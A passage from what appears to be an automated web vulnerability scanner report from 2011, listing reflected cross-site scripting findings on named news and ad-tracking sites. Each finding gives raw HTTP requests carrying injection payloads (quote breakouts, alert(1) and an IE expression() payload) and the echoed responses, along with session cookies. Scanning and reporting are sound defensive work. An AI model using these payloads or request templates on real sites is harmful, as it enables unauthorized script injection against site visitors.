OguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAjBvFyAAAAAA./cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..e4fb3'-alert(1)-'79dc16e5093/referrer=http%3A%2F%2Fwww.quickyellow.com%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Y
...[SNIP]...

2.21. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4fd7'%3b4584f664dff was submitted in the REST URL parameter 1. This input was echoed as d4fd7';4584f664dff in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skinsd4fd7'%3b4584f664dff/news1/favicon.ico HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489; s_cc=true; s_sq=%5B%5BB%5D%5D; session_id=1733305373; daily_id=1733305373; user_id=1733305373; _chartbeat2=t5h1gz8ikos4d109

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56082
Vary: Accept-Encoding
Cache-Control: public, max-age=550
Expires: Fri, 01 Apr 2011 18:20:40 GMT
Date: Fri, 01 Apr 2011 18:11:30 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://manhattan.ny1.com:80/App_Skinsd4fd7';4584f664dff/news1/favicon.ico'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.22. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6514e'%3bd51675d856b was submitted in the REST URL parameter 2. This input was echoed as 6514e';d51675d856b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /App_Skins/news16514e'%3bd51675d856b/favicon.ico HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489; s_cc=true; s_sq=%5B%5BB%5D%5D; session_id=1733305373; daily_id=1733305373; user_id=1733305373; _chartbeat2=t5h1gz8ikos4d109

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56080
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:42 GMT
Date: Fri, 01 Apr 2011 18:11:42 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?404;http://manhattan.ny1.com:80/App_Skins/news16514e';d51675d856b/favicon.ico'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.23. http://manhattan.ny1.com/App_Skins/news1/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /App_Skins/news1/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acaf1'%3b7079e6feb81 was submitted in the REST URL parameter 3. This input was echoed as acaf1';7079e6feb81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /App_Skins/news1/favicon.icoacaf1'%3b7079e6feb81 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489; s_cc=true; s_sq=%5B%5BB%5D%5D; session_id=1733305373; daily_id=1733305373; user_id=1733305373; _chartbeat2=t5h1gz8ikos4d109

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:52 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56170
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:53 GMT
Date: Fri, 01 Apr 2011 18:11:53 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/App_Skins/news1/favicon.icoacaf1';7079e6feb81/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.24. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /Content/ServeContent.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42631'%3bc0299a9928d was submitted in the REST URL parameter 1. This input was echoed as 42631';c0299a9928d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content42631'%3bc0299a9928d/ServeContent.aspx?id=709&ticks=813226 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:01 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56119
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:02 GMT
Date: Fri, 01 Apr 2011 18:11:02 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content42631';c0299a9928d/ServeContent.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.25. http://manhattan.ny1.com/Content/ServeContent.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /Content/ServeContent.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86be6'%3b2133abcc347 was submitted in the REST URL parameter 2. This input was echoed as 86be6';2133abcc347 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeContent.aspx86be6'%3b2133abcc347?id=709&ticks=813226 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56167
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:09 GMT
Date: Fri, 01 Apr 2011 18:11:09 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeContent.aspx86be6';2133abcc347/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.26. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdf4b'%3b8443ca8f92f was submitted in the REST URL parameter 1. This input was echoed as bdf4b';8443ca8f92f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Contentbdf4b'%3b8443ca8f92f/ServeResource.aspx?id=687&ticks=1915729545 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1915729545
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:04 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56125
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:06 GMT
Date: Fri, 01 Apr 2011 18:11:06 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Contentbdf4b';8443ca8f92f/ServeResource.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.27. http://manhattan.ny1.com/Content/ServeResource.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /Content/ServeResource.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa860'%3b7174f58ce9f was submitted in the REST URL parameter 2. This input was echoed as fa860';7174f58ce9f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Content/ServeResource.aspxfa860'%3b7174f58ce9f?id=687&ticks=1915729545 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/Content/ServeContent.aspx?iframe=1&id=687&ticks=1915729545
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:08 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56168
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:13 GMT
Date: Fri, 01 Apr 2011 18:11:13 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content/ServeResource.aspxfa860';7174f58ce9f/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.28. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /content/top_stories/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b67a1'%3b361ba9d45fb was submitted in the REST URL parameter 1. This input was echoed as b67a1';361ba9d45fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /contentb67a1'%3b361ba9d45fb/top_stories/ HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56145
Vary: Accept-Encoding
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:29 GMT
Date: Fri, 01 Apr 2011 18:11:29 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/contentb67a1';361ba9d45fb/top_stories/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.29. http://manhattan.ny1.com/content/top_stories/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://manhattan.ny1.com
Path:   /content/top_stories/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc2d4'%3b52263977e93 was submitted in the REST URL parameter 2. This input was echoed as dc2d4';52263977e93 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /content/top_storiesdc2d4'%3b52263977e93/ HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 56146
Vary: Accept-Encoding
Cache-Control: public, max-age=564
Expires: Fri, 01 Apr 2011 18:20:59 GMT
Date: Fri, 01 Apr 2011 18:11:35 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - NY1.com
</title><meta
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?aspxerrorpath=/content/top_storiesdc2d4';52263977e93/default.aspx'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.30. http://manhattan.ny1.com/content/top_stories/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://manhattan.ny1.com
Path:   /content/top_stories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6532b'-alert(1)-'736431dcdb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /content/top_stories/?6532b'-alert(1)-'736431dcdb1=1 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/favicon.ico?80003'-alert(1)-'46fe3f653ad=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Last-Modified: Fri, 01 Apr 2011 18:11:24 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 86281
Cache-Control: public, max-age=600
Expires: Fri, 01 Apr 2011 18:21:26 GMT
Date: Fri, 01 Apr 2011 18:11:26 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head id="ctl00_Head1"><title>
   Top Stories - - NY1.com
</title><me
...[SNIP]...
<![CDATA[
var stationId = 1; var currentQueryString = '?SectionPath=%2fcontent%2ftop_stories%2f&6532b'-alert(1)-'736431dcdb1=1'; var gRegionSelected = '5';//]]>
...[SNIP]...

2.31. http://pixel.fetchback.com/serve/fb/pdc [name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The value of the name request parameter is copied into the HTML document as plain text between tags. The payload a1c83<x%20style%3dx%3aexpression(alert(1))>6abbaef0b4c was submitted in the name parameter. This input was echoed as a1c83<x style=x:expression(alert(1))>6abbaef0b4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /serve/fb/pdc?cat=&name=landinga1c83<x%20style%3dx%3aexpression(alert(1))>6abbaef0b4c&sid=3047 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.mercantila.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=92051597.1299094491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=92051597.1024711904.1299094491.1299094491.1299169676.2; uat=1_1299171815; cmp=1_1300411186_10164:0_10638:0_10640:0_10641:0_1437:0_8900:39_9081:108616_9085:108616_8956:108616_9083:108639_9084:108639_8956:108639_20:1241462; sit=1_1300411186_2701:39:39_719:121:0_2707:108839:108616_3225:390277:390277_828:912792:912792_11:1316717:1241462_3314:1320455:1239371_3289:1321705:1316218_2002:2548865:2547644; bpd=1_1300411186_h9i9:5WgZ; apd=1_1300411186; afl=1_1300411186; cre=1_1300993416_20056:6436:8:0_15292:30504:1:161993_19000:38838:1:162006_20053:24803:11:351268_20054:24802:1:351668_14598:11789:1:1624812; kwd=1_1300993416_11317:582230_11717:582230_11718:582230_11719:582230_11722:690865_10827:690865_10842:690869_10839:690869_10824:691069; scg=1_1300993416; ppd=1_1300993416; uid=1_1300993418_1297862321306:0415785655118336; eng=1_1300993418_20056:0

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:01:55 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1301677315_11259:9_10164:1266129_10638:1266129_10640:1266129_10641:1266129_1437:1266129_8900:1266168_9081:1374745_9085:1374745_8956:1374745_9083:1374768_9084:1374768_8956:1374768_20:2507591; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: uid=1_1301677315_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: kwd=1_1301677315_11317:1266129_11717:1266129_11718:1266129_11719:1266129_11722:1374764_10827:1374764_10842:1374768_10839:1374768_10824:1374968; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
Set-Cookie: sit=1_1301677315_3047:9:9_2701:1266168:1266168_719:1266250:1266129_2707:1374968:1374745_3225:1656406:1656406_828:2178921:2178921_11:2582846:2507591_3314:2586584:2505500_3289:2587834:2582347_2002:3814994:3813773; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/
